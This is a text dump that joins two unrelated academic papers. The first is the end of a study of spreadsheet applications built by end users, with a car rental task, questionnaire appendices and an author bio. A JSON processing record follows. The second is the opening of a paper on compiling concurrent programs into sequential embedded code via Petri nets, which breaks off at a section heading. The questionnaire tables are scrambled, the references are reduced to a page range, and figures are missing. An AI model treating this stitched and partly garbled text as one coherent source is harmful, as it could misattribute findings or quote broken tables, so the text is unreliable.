results are also consistent with McGill et al.'s (1998) study in the end user developer domain, where end user developers were found to be more satisfied with their own applications. The results also strongly support Cheney, Mann and Amoroso's (1986) claim that end user development can be considered as the ultimate user involvement. The higher levels of perceived system quality for end users’ own applications highlight the subjectivity of system quality for end users. This issue has been raised by Huitfeldt and Middleton (2001), who argued that the standard system quality criteria are oriented towards information technology maintenance staff rather than towards end users and that “it is still difficult for an end user, or software development client, to evaluate the quality of the delivered product” (p. 3). Although the instrument used to measure perceived system quality in this study was designed specifically for end users (Rivard et al., 1997), informal feedback from participants suggests they found quality assessment a difficult task. In contrast to ‘software engineering’ definitions of system quality (e.g., Boehm et al., 1978; Cavano & McCall, 1978), Amoroso and Cheney (1992) implicitly acknowledge this difficulty by defining UDA quality as a combination of end user information satisfaction and application utilization. This, however, ignores the underlying necessity for the more technical dimensions of system quality to be taken account of in order to have reliable and maintainable applications.
End user developers made significantly more correct decisions when using their own applications than when using an application developed by another end user. In this study, all participants had also used both the application they had developed and another application, so domain knowledge was not a factor. The improved performance could be due to a greater familiarity with the application itself, achieved through the development process. Successful use of user developed spreadsheet applications appears to require substantial end user knowledge because of the lack of separation of data and processing that is commonly found (Hall, 1996; Ronen et al., 1989). Users of UDAs do not usually receive formal training in the particular application; yet training is associated with successful use (Nelson, 1991). Developing an application allows the user to develop a robust understanding of it that makes it easier to use and makes it possible for them to successfully adjust aspects of it when necessary. The development process can be seen as a form of training for future use of the application, and it can circumvent problems that might otherwise occur because of lack of training and/or documentation.
The improved performance could also be due to a greater determination to achieve the correct answers, because of the higher levels of involvement. This explanation receives support from the additional time user developers spent making the decisions. On average, the user developers spent an extra two-and-a-half minutes trying to answer the 10 questions. This was unexpected, as it would be logical to expect end users to spend less time using the applications they understand best, but may be due to the end user developers’ greater commitment to succeeding with their own applications. Comments from participants during the sessions support this possible explanation. In addition, many participants continued working on their applications once the formal part of the experiments was completed; some even continued to adapt their appli-
McGill et al. (1998) questioned the usefulness of user satisfaction as a measure of UDA success after finding that developers of UDAs were significantly more satisfied with applications they had developed than other end users were with the same applications. They speculated that increased satisfaction might be a reflection of the role of attitude in maintaining self-esteem, and expressed concerns that this increased satisfaction might blind end user developers to problems that exist in the applications they have developed. However, no measures of performance were included in that study. This study suggests that the raised levels of user satisfaction and other perceptual variables were appropriate, as they were consistent with better levels of performance.
Both subjective and direct measures of UDA success have an important role to play in research on user development of applications. Shayo et al. (1999) noted that subjective measures are less threatening and easier to obtain, thus making end user computing research easier to conduct. Subjective measures can also reflect a wider range of success factors than can be captured using direct measures such as decision accuracy. However, exclusive use of subjective measures can be problematic because users are asked to place a value on something about which they may not be objective. By including both types of measures, this study has demonstrated a range of benefits attributable to end user development and has provided a measure of confidence that increases in subjective measures are also associated with increases in some direct measures.
The results of this comparison between end user developers using their own applications and end users using applications developed by other end users has implications for staff movement in organizations. If an end user develops an application for his or her own use, and its use has a positive impact on performance, this does not guarantee that the same will be true if another end user starts to use it. Organizations should recognize that the use of UDAs by end users other than the developer may carry with it greater risks. If an end user developer has developed an application for his or her own use and then leaves the position or organization, it cannot be assumed that another end user will necessarily be able to use it successfully. In addition, if users are developing applications for others to use, particular attention must be paid to ensure that these applications are of sufficient quality for successful use not to rely on additional insight gained during the development process. As previously discussed, the development process provides a form of preparation for future use of an application and may reduce dependence on training and documentation. However, users of a UDA who were not involved in its development still rely heavily on documentation and training, and the importance of them must be emphasized.
Several limitations of the research are apparent and should be considered in future investigations of end user development success. First, the only application development tool considered was spreadsheets. While spreadsheets have been the most commonly used end user application development tool (Taylor et al., 1998), the generalizability of the results to users of other development tools, such as database management systems and Web development tools, needs to be investigated in future research. A second limitation of the research was the constraints resulting from the use of a laboratory experiment research approach. The spreadsheets that participants developed were probably smaller.
than the majority of spreadsheets developed by users in support of organizational decision making (Hall, 1996). In addition, because of the finite nature of the experiment, end users did not have the same incentive to succeed as would be expected in a work situation. The artificial nature of the environment and task may have influenced the results. While the research situation chosen provided the benefit of control of external variability and hence internal validity, it was not ideal in terms of providing external validity. It would be valuable to undertake a field study in a range of organizations to extend the external validity of the research.
CONCLUSION
In conclusion, this study suggests that the process of developing an application leads to significant advantages for the end user developer. In the past, the proposed benefits of user development of applications have been mainly attributed to a belief that the user has a superior understanding of the problem to be solved by the application system (Amoroso, 1988). In this study, all end users should have had equal knowledge and understanding of the problem when using both the application they had developed and the other application so any differences in domain knowledge were not a factor.
The relative success of the end user developers when using their own applications in this study may flow from their superior knowledge of their own applications, thus confirming one of the proposed advantages of user involvement in organizational information systems development. The advantage of superior knowledge of the application is likely to be particularly important with spreadsheet applications where data and processing are usually integrated (Hall, 1996; Ronen et al., 1989). Future research should investigate whether these findings also hold when other application development tools are used and with other groups of end user developers.
There have been concerns expressed in the literature about user development of applications as an inefficient use of personnel time, distracting end users from what they are supposed to be doing (Alavi & Weiss, 1985-1986; Davis & Srinivasan, 1988; O’Donnell & March, 1987). However, this study suggests that the potential risk of inefficient use of personnel time may be compensated for by superior decision making later, based upon insights gained from system development. While development of applications by more experienced user developers or by information systems professionals may ensure a more reliable and maintainable application (Edberg & Bowman, 1996), end user development is currently a pervasive form of organizational system development and it is encouraging to identify this benefit of it. However, the findings relating to differences in end user success between those who have developed the application they are using and those who haven’t emphasize that organizations should recognize that the use of UDAs by end users other than the developer may carry with it greater risks, and that these must be addressed by particular attention to documentation of applications and training for other users. It is not appropriate that successful use relies on insight gained during the development process. UDAs must be sufficiently robust and reliable to be used by a wide range of users.
CAR RENTAL PROBLEM
Deciding which car rental company to choose when planning a holiday can be quite difficult. A local consumer group has asked you to set up a spreadsheet to help people make decisions about car rental options. The spreadsheet will enable users to determine which company provides the cheapest option for them, given how long they need to hire a car and how much driving they intend to do.
After investigating the charges of the major companies, you have the following information about the options for hiring a compact size car in Australia.
- Advantage Car Rentals charges $35 per day for up to 100 kilometers per day. Extra driving beyond 100 kilometers per day is charged a $0.25/km excess.
- OnRoad Rentals charges $41 per day. This rate includes 200 free kilometers per day. Extra kilometers beyond that are charged at the rate of $0.30/km.
- Prestige Rent-A-Car charges $64 per day for unlimited kilometers.
Your task is to create a spreadsheet that will allow you or someone else using it to type in the number of days they will need the car and the number of kilometers they expect to drive over the time of the rental. The spreadsheet should then display the rental cost for each of the above three companies.
APPENDIX 1
The problem statement given to participants in Part 2 of the experimental session
APPENDIX 2
Items included in questionnaire to measure end user perceptions
<table>
<thead>
<tr>
<th>Perceived system quality</th>
<th>strongly disagree</th>
<th>strongly agree</th>
</tr>
</thead>
<tbody>
<tr>
<td>Using the spreadsheet would be easy, even after a long period of not using it</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>Errors in the spreadsheet are easy to identify</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>The spreadsheet increased my data processing capacity</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>The spreadsheet is easy to learn by new users</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>Should an error occur, the spreadsheet makes it straightforward to perform some checking in order to locate the source of error</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>The data entry sections provide the capability to easily make corrections to data</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>The same terminology is used throughout the spreadsheet</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>This spreadsheet does not contain any errors</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>The terms used in the spreadsheet are familiar to users</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>Data entry sections of the spreadsheet are organized so that the different bits of data are grouped together in a logical way</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
<tr>
<td>The data entry areas clearly show the spaces reserved to record the data</td>
<td>1 2 3 4</td>
<td>5 6 7</td>
</tr>
</tbody>
</table>
The format of a given piece of information is always the same, wherever it is used in the spreadsheet
Data is labeled so that it can be easily matched with other parts of the spreadsheet
The spreadsheet is broken up into separate and independent sections
Use of this spreadsheet would reduce the number of errors you make when choosing a rental car
Each section has a unique function or purpose
Each section includes enough information to help you understand what it is doing
Queries are easy to make
The spreadsheet provides all the information required to use the spreadsheet (this is called documentation)
Corrections to errors in the spreadsheet are easy to make
<table>
<thead>
<tr>
<th><strong>Involvement</strong></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
</tr>
</thead>
<tbody>
<tr>
<td>This car rental spreadsheet is:</td>
<td>important</td>
<td>needed</td>
<td>essential</td>
<td>fundamental</td>
<td>significant</td>
<td>means a lot to me</td>
<td>exciting</td>
</tr>
<tr>
<td>unimportant</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>not needed</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>nonessential</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>trivial</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>insignificant</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>means nothing to me</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>unexciting</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>of no concern to me</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>not of interest to me</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>irrelevant to me</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
<tr>
<td>doesn’t matter to me</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>7</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th><strong>User satisfaction</strong></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
</tr>
</thead>
<tbody>
<tr>
<td>How adequately do you feel the spreadsheet meets your information processing needs when answering car rental queries?</td>
<td>inadequately</td>
<td>adequately</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
</tr>
<tr>
<td>How efficient is the spreadsheet?</td>
<td>inefficient</td>
<td>efficient</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
</tr>
<tr>
<td>How effective is the spreadsheet?</td>
<td>ineffective</td>
<td>effective</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
</tr>
<tr>
<td>Overall, are you satisfied with the spreadsheet?</td>
<td>dissatisfied</td>
<td>satisfied</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th><strong>Perceived individual impact</strong></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
</tr>
</thead>
<tbody>
<tr>
<td>The spreadsheet has a large, positive impact on my effectiveness and productivity in answering car rental queries</td>
<td>disagree</td>
<td>agree</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
</tr>
<tr>
<td>The spreadsheet is an important and valuable aid to me in answering car rental queries</td>
<td>disagree</td>
<td>agree</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
</tr>
</tbody>
</table>
REFERENCES
24-31.
Tanya McGill is a senior lecturer in the School of Information Technology at Murdoch University in Western Australia. She has a PhD from Murdoch University. Her major research interests include end user computing and information technology education. Her work has appeared in various journals including the Information Resources Management Journal, Journal of Research on Computing in Education, European Journal of Psychology of Education, Journal of the American Society for Information Science, and Journal of End User Computing.
|
{"Source-Url": "http://researchrepository.murdoch.edu.au/id/eprint/827/1/effect_of_end_user_development.pdf", "len_cl100k_base": 11328, "olmocr-version": "0.1.49", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 48700, "total-output-tokens": 14478, "length": "2e13", "weborganizer": {"__label__adult": 0.0007429122924804688, "__label__art_design": 0.0010509490966796875, "__label__crime_law": 0.0006313323974609375, "__label__education_jobs": 0.14892578125, "__label__entertainment": 0.00035858154296875, "__label__fashion_beauty": 0.0003609657287597656, "__label__finance_business": 0.01137542724609375, "__label__food_dining": 0.0007872581481933594, "__label__games": 0.00145721435546875, "__label__hardware": 0.0014190673828125, "__label__health": 0.0016078948974609375, "__label__history": 0.0011053085327148438, "__label__home_hobbies": 0.0004048347473144531, "__label__industrial": 0.0008368492126464844, "__label__literature": 0.0025882720947265625, "__label__politics": 0.0004830360412597656, "__label__religion": 0.0007472038269042969, "__label__science_tech": 0.0833740234375, "__label__social_life": 0.0006513595581054688, "__label__software": 0.05511474609375, "__label__software_dev": 0.68359375, "__label__sports_fitness": 0.0004334449768066406, "__label__transportation": 0.001415252685546875, "__label__travel": 0.0005445480346679688}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 59965, 0.0438]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 59965, 0.194]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 59965, 0.93877]], "google_gemma-3-12b-it_contains_pii": [[0, 2319, false], [2319, 4182, null], [4182, 7816, null], [7816, 11431, null], [11431, 14782, null], [14782, 17833, null], [17833, 21098, null], [21098, 24556, null], [24556, 27919, null], [27919, 31232, null], [31232, 34870, null], [34870, 38440, null], [38440, 42076, null], [42076, 45391, null], [45391, 48568, null], [48568, 51091, null], [51091, 54206, null], [54206, 57345, null], [57345, 59965, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2319, true], [2319, 4182, null], [4182, 7816, null], [7816, 11431, null], [11431, 14782, null], [14782, 17833, null], [17833, 21098, null], [21098, 24556, null], [24556, 27919, null], [27919, 31232, null], [31232, 34870, null], [34870, 38440, null], [38440, 42076, null], [42076, 45391, null], [45391, 48568, null], [48568, 51091, null], [51091, 54206, null], [54206, 57345, null], [57345, 59965, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 59965, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 59965, null]], "pdf_page_numbers": [[0, 2319, 1], [2319, 4182, 2], [4182, 7816, 3], [7816, 11431, 4], [11431, 14782, 5], [14782, 17833, 6], [17833, 21098, 7], [21098, 24556, 8], [24556, 27919, 9], [27919, 31232, 10], [31232, 34870, 11], [34870, 38440, 12], [38440, 42076, 13], [42076, 45391, 14], [45391, 48568, 15], [48568, 51091, 16], [51091, 54206, 17], [54206, 57345, 18], [57345, 59965, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 59965, 0.21429]]}
|
olmocr_science_pdfs
|
2024-11-25
|
2024-11-25
|
bb55dce89b445727f69f18b5cafd1453ca019538
|
Compiling concurrent programs for embedded sequential execution
Bill Lin
Electrical and Computer Engineering Department, University of California, San Diego, La Jolla, CA 92093-0407, USA
Abstract
Embedded applications are often more naturally modeled as a set of concurrent tasks, but yet they are often implemented using a single embedded processor. Traditionally, run-time operating systems have been used to simulate concurrency by timesharing the underlying processor and to facilitate inter-process communication amongst the concurrent tasks. However, this run-time approach to multi-tasking and inter-process communication can often introduce significant overhead to execution times and memory requirements, prohibitive in many cases for embedded applications where processor and memory resources are scarce. In this paper, we present compilation techniques that can statically resolve concurrency at compile-time so that the resulting code produced can be sequentially executed on an embedded processor without the need for a run-time scheduler. Our techniques are based on a novel Petri net theoretic framework. In particular, we show how a concurrent program specification can be transformed into an intermediate Petri net representation. We then show how the intermediate Petri net may be statically scheduled to produce a sequential state machine model that can be sequentially executed directly on an embedded processor without a run-time operating system. In practice, this technique produces efficient results. However, theoretically, it is possible for the resulting state machine to become very large, resulting in code explosion. To circumvent this limitation, we describe a compositional approach that can scale well to large applications and is immune to code explosion.
© 2006 Published by Elsevier B.V.
1. Introduction
Software is playing an increasingly important role in embedded systems. This trend is being driven by a wide spectrum of embedded applications, ranging from personal communications systems, to consumer electronics, to automotive, each forming a highly competitive segment of the embedded systems market. In many cases, the software runs on a processor core that is integrated as part of a VLSI chip.
While high-level language compilers exist for implementing sequential programs on embedded processors [1–5], e.g. starting from C, and improved compilers are emerging for digital signal processing (DSP) oriented architectures and in-house application-specific instruction-set processors (ASIPs) [4,5], many embedded software applications are more naturally expressed as concurrent programs, specified in terms of communicating processes. This is because actual system applications are typically composed of multiple tasks. Communicating processes have several attractive properties: they provide a modular way of capturing concurrent behavior, they provide a high-level abstraction for data communication and synchronization, they can be hierarchically composed to form larger systems, and they define a natural level of granularity for partitioning over different distributed hardware–software architectures.
Currently, the most widely deployed solution is to use an embedded operating system to manage the run-time scheduling of processes and inter-process communication. However, this solution can introduce significant overhead to execution times and memory requirements. The execution time overhead is prohibitive in embedded applications where performance is paramount. The memory overhead often translates directly to silicon cost for many system-on-a-chip applications where the program and data memories are partly on-chip. Handcrafted solution is another commonly used approach where concurrent programs are manually rewritten in terms of a sequential program by the designer. This approach is tedious, timing consuming, and
Several alternative high-level approaches have been proposed. Static data-flow solutions [6–8], successfully used to design DSP-oriented systems, achieve compile-time scheduling at the expense of disallowing conditional and non-deterministic execution. Other researchers have considered hybrid approaches [9,10] that generate application-specific run-time schedulers to handle the multi-tasking of conditional and non-deterministic computations. Another important body of work is based on a reactive synchronous specification model [11–13]. These compilation techniques are based on a strong synchrony hypothesis that makes two fundamental assumptions: the existence of a global clock abstraction to discretize computation over instances, and computation conceptually takes no time within each instance. In contrast, our work is based on a model of asynchrony where the concurrent parts can evolve independently and only synchronize where specified.
In this paper, we present new compilation techniques that can generate efficient sequential code from asynchronous process-based program specifications. The resulting sequential code generated can be executed on an embedded processor without the need for a run-time scheduler. The input specification is captured in a C-like programming language that has been extended with mechanisms for concurrency and communication. These extensions are based on the model of Communicating Sequential Processes (CSP), as defined by Hoare [14]. This program specification is described in Section 2. From the input program, an intermediate interpreted Petri net representation is first constructed. This intermediate representation is discussed in Section 3.
A key advantage of this intermediate construction is that the ordering relations across process boundaries are made explicit in the derived Petri net model. Our compilation approach makes use of this partial order information to statically schedule the Petri net to produce a sequential state machine model that can be sequentially executed directly on an embedded processor without a run-time operating system. The sequential state machine produced may be represented as an ordinary C program, which can then be readily retargeted to different processors using processor-specific code generators. Process-level concurrency is statically compiled away while retaining as much partial order information as possible so that maximal freedom is given to the subsequent code generation tools to optimize the scheduling of instructions. This Petri net theoretic compilation method is detailed in Section 4.
In practice, this method produces efficient results. However, theoretically, it is possible for the resulting state machine to become very large, resulting in code explosion. To circumvent this limitation, we describe a compositional approach that first transforms the initial input specification into a set of interacting Petri net components. We then apply the same static scheduling method on each Petri net component to produce a corresponding state machine. The resulting set of interacting state machines are then mapped into a single sequential C program for further processor-specific code generation. In the degenerate case, each process in the initial input specification is mapped into a separate Petri net component. In this case, the size of the resulting sequential code is directly proportional to the size of the original concurrent specification. Thus, this technique can scale well to large applications and is immune to code explosion. This compositional method is detailed in Section 5. The degenerate case is discussed in Section 6.
Finally, in Section 7, we present experimental results to demonstrate the potentials for significant improvements over current run-time solutions.
2. Programming model
In this work, we use a process-based specification as the user-level programming model. Our programming model looks like a C program: the syntactic structure and expression syntax are nearly identical. However, our programming model provides language mechanisms not found in C for specifying processes and channel communications, based on the CSP formalism [14]. In addition to its expressive power to handle parallelism and communication, CSP has a rigorously defined semantics along with a well-defined algebra to reason about the concurrent behavior, which lends well to formal verification. This section presents a brief overview of our programming model by means of examples.
Our programs are hierarchically composed of processes that communicate through synchronizing channels. A simple program is illustrated in Fig. 1. This example is composed of two processes called ping and pong.
```c
1 /* this is a process */
2 ping (input chan(int) a, output chan(int) b)
3 {
4 int x;
5 for(;;) {
6 x = -a; /* receive */
7 if (x < 100) x = 10 - x;
8 else x = 10 + x;
9 b <= x; /* send */
10 }
11 }
12 /* this is another process */
13 pong (input chan(int) c, output chan(int) d)
```
Fig. 1. Process model.
3. Intermediate representation
Our compilation techniques use an interpreted Petri net model as its intermediate representation. In this section, we first provide basic definitions and classification of Petri nets. We then informally, by means of examples, illustrate how an intermediate Petri net representation may be hierarchically constructed from a program of communicating processes.
3.1. Petri nets
Let $G = (P, T, F, m_0)$ be a Petri net [15], where $P$ is a set of places, $T$ is a set of transitions, $F \subseteq (P \times T) \cup (T \times P)$ is the flow relation, and $m_0 : P \rightarrow N$ is the initial marking, where $N$ is the set of natural numbers.
The symbols $\bullet t$ and $t \bullet$ define, respectively, the set of input places and the set of output places of transition $t$. Similarly, $\bullet p$ and $p \bullet$ define, respectively, the set of input transitions and the set of output transitions of place $p$.
A place $p$ is called a conflict place if it has more than one output transition. Two transitions, $t_i$ and $t_j$, are said to be in conflict, denoted by $t_i \# t_j$, if and only if $\bullet t_i \cap \bullet t_j \neq \emptyset$.
A state, or marking, $m : P \rightarrow N$, is an assignment of a non-negative integer to each place. $m(p)$ denotes the number of tokens in the place $p$. A transition $t$ can fire at marking $m_1$ if all its input places contain at least one token. The firing of $t$ removes one token from each of its input places and adds a new token to each of its output places, leading to a new marking $m_2$. This firing is denoted by $m_1 \rightarrow m_2$.
Given a Petri net $G$, the reachability set of $G$ is the set of all markings reachable in $G$ from the initial marking $m_0$ via the reflexive transitive closure of the above firing relation. The corresponding graphical representation is called a reachability graph.
A Petri net $G$ is said to be safe if in every reachable marking, there is at most one token in any place. In this case, we can simply represent each marking $m : P \rightarrow \{0, 1\}$ as a binary assignment.
3.2. Classes of Petri nets
A Marked Graph (MG) is a net $G = (P, T, F, m_0)$ such that $\forall p \in P : |\bullet p| = 1 = |p \bullet|$. MGs cannot model conflicts.
A State Machine (SM) is a net $G = (P, T, F, m_0)$ such that $\forall t \in T : |\bullet t| = 1 = |t \bullet|$. SMs cannot model concurrency.
A Free-Choice Net (FC-net) is a net $G = (P, T, F, m_0)$ such that $\forall t_1, t_2 \in T, t_1 \neq t_2 : \bullet t_1 \cap \bullet t_2 \neq \emptyset \Rightarrow |\bullet t_1| = 1 = |\bullet t_2|$, or $\forall p_1, p_2 \in P, p_1 \neq p_2 : p_1 \bullet p_2 \bullet \neq \emptyset \Rightarrow |p_1 \bullet| = 1 = |p_2 \bullet|$. Every MG and SM is a FC-net. For FC-nets, all conflicts can be decided locally.
Let $G'$ be a subset of a net $G$ generated by a non-empty set $X \subseteq P \cup T$. $G'$ is a MG-Component of $G$ if $\bullet t \cup t \subseteq X$ for every $t \in X$, and $G'$ is a strongly connected MG.
Let $G'$ be a subset of a net $G$ generated by a non-empty set $X \subseteq P \cup T$. $G'$ is a SM-Component of $G$ if $\bullet p \cup p \subseteq X$ for every $p \in X$, and $G'$ is a strongly connected SM.
$G$ is said to be covered by a set of MG-Components if every transition of the net belongs to some MG-Component. $G$ is said to be covered by a set of SM-Components if every place of the net belongs to some SM-Component. Hack [16] proved that a live safe FC-net can always be covered by a set of MG-Components or a set of SM-Components.
3.3. Petri net construction
In [17,18], a process algebra was developed for constructing a Petri net model from a program of communication.
processes. Among other operations, the process algebra defines operators for sequential composition, choice composition, recursive composition, and parallel composition. The reader can refer to [17,18] for details. Here, we intuitively illustrate by means of examples how these operators are used to build up the Petri net intermediate representation.
Consider again the example shown in Fig. 1. The derived Petri net models for processes ping and pong are shown in Fig. 2(a) and (b), respectively, along with their initial markings. These Petri nets can be derived by mapping each leaf operation to a primitive transition. Each transition corresponding to a computation action is assigned a separate action label (e.g. b, c, d, and f in Fig. 2). For communication actions, all communication actions along the same channel are assigned the same label (e.g. c1 and c2 in Fig. 2). These primitive transitions can be mapped to a Petri net by iteratively applying the sequential, choice, and recursive composition operators on them.
Concurrent processes can be composed via parallel composition. In parallel composition, communication actions in fact form synchronization points and are joined together at their common transitions. In Petri net theory, parallel composition is essentially a Cartesian product of the two Petri net processes along common labeled actions. This is illustrated in Fig. 2(c).
Observe that once two Petri nets are composed together, all internal communications between the two nets disappear. The actual send and receive operations are eliminated. Instead, they are replaced with simple assignment statements, thus eliminating the communication overhead. Synchronization is represented by explicit partial orderings at the Petri net level. This is a key property since ordering relations across process boundaries are made explicit in the derived Petri net representation. This ordering relations can be used to statically schedule the operations accordingly at compile time, as discussed in Section 4.
4. Sequential code generation
This section describes a static scheduling procedure that works from an intermediate Petri net representation. This section is divided into two parts. We first introduce some basic notions and the concept of an expansion, which corresponds to an acyclic Petri net fragment. We then describe how sequential code can be generated from the expansions.
4.1. Expansions
Before proceeding, we need to introduce several notions.
**Definition 4.1 (Expansion).** An expansion is an acyclic Petri net with the following properties:
- There is one or more places without input transitions.
- There is one or more places without output transitions.
- There are no transitions without at least one input place or one output place.
The places without input transitions are called initial places. The places without output transitions are called cut-off places.
**Definition 4.2 (Maximal expansion).** Let $G$ be a Petri net and let $m$ be a marking of $G$. The maximal expansion of $G$

with respect to \( m, E \), is an acyclic Petri net with the following properties:
- The initial places correspond to \( m \).
- The cut-off places correspond to the set of places encountered when a cycle has been reached.
- \( E \) is transitively closed: for each \( t \in E \) or \( p \in E \), all preceding places and transitions reachable from \( m \) are also in \( E \).
\( m \) is referred to as the initial marking.
Intuitively, the maximal expansion of \( G \) with respect to a marking \( m \) corresponds to the largest unrolling of \( G \) from \( m \) before a cycle has been encountered. Consider the example shown in Fig. 3(a). The corresponding maximal expansion with \( m = (p_1, p_2) \) is shown in Fig. 3(b).
**Definition 4.3 (Cut-off markings).** Let \( G \) be a Petri net, and let \( E \) be a maximal expansion of \( G \) with respect to the initial marking \( m \). A marking \( m_c \) is said to be a cut-off marking if it is reachable from \( m \) and no transitions are enabled to fire. The set of cut-off markings is denoted by \( C(E) \).
For the example shown in Fig. 3, there are two possible cut-off markings \( m_{c_1} = (p_1', p_2') \) and \( m_{c_2} = (p_3', p_4') \), shown, respectively, in Fig. 3(c) and (d).
Our compilation procedure works by generating code from a maximal expansion segment \( E \) obtained by using the initial marking \( m_0 \) as the initial marking for the expansion. Then from each cut-off marking \( m_c \in C(E) \), a new maximal expansion segment \( E_i \) is generated using \( m_c \) as the initial marking. This iteration terminates when all cut-off markings have already been visited. The pseudocode for the overall algorithm is shown below.
```plaintext
compile (G, m_0)
{
R = \{m_0\};
push (m_0);
while ((m = pop()) \neq \emptyset) {
E = maximal-expansion (G, m);
static-scheduling (E, m);
foreach \( m_c \in C(E) \) {
if \( m_c \notin R \) {
R = R \cup m_c;
push (m_c);
}
}
}
}
```
The static-scheduling step is applied to each expansion segment to produce the actual code.
In the example shown in Fig. 3, only two expansion segments are needed. From the initial marking \( m = (p_1, p_2) \), the only cut-off markings reachable are \( m_{c_1} = (p_1, p_2) \) and \( m_{c_2} = (p_3, p_4) \). However, from \( m = (p_3, p_4) \), the only cut-off marking reachable is \( m_c = (p_3, p_4) \) itself, as shown in Fig. 4.
However, in the example shown in Fig. 2, only one expansion segment is needed since the only cut-off marking


reachable from the initial marking is the initial marking itself (i.e. \( m = (p_1, p_2) \)).
4.2. Properties
The expansion procedure described in Section 4.1 is guaranteed to converge since the number of possible markings in a Petri net is finite. Hence, the number of expansions or iterations is also finite. Typically, very few expansions are required.
For certain classes of Petri nets, the convergence property is even stronger. In the case of a strongly connected live safe MG, the number of expansions is exactly one. This is because in the case of a strongly connected live safe MG, the initial marking \( m_0 \) forms a minimal feedback arc set. The number of tokens along any directed cycle in the MG in the initial marking is exactly one. Thus, according to Definition 4.2, the maximal expansion of a MG \( G \) with respect to its initial marking \( m_0 \) is exactly defined as the acyclic Petri net \( E \) where both the initial places and the cut-off places correspond exactly to the places marked by \( m_0 \). Thus, the set of cut-off markings for \( E \) contains only the initial marking \( m_0 \).
In the case of a strongly connected live safe FC-net \( G \) that can be covered by a set of strongly connected live safe MG components \( G_1, \ldots, G_n \) such that the initial marking \( m_0 \) of \( G \) restricted to \( G_i \) is also a live safe initial marking for the MG component \( G_i \), the number of expansions is also exactly one. The argument follows a similar line as the argument for the MG case. That is, the initial marking \( m_0 \) corresponds to both the initial places and cut-off places if we maximally expand \( G \) with respect to \( m_0 \). Thus, convergence is guaranteed after one expansion since the set of cut-off markings contains only \( m_0 \).
4.3. Static scheduling
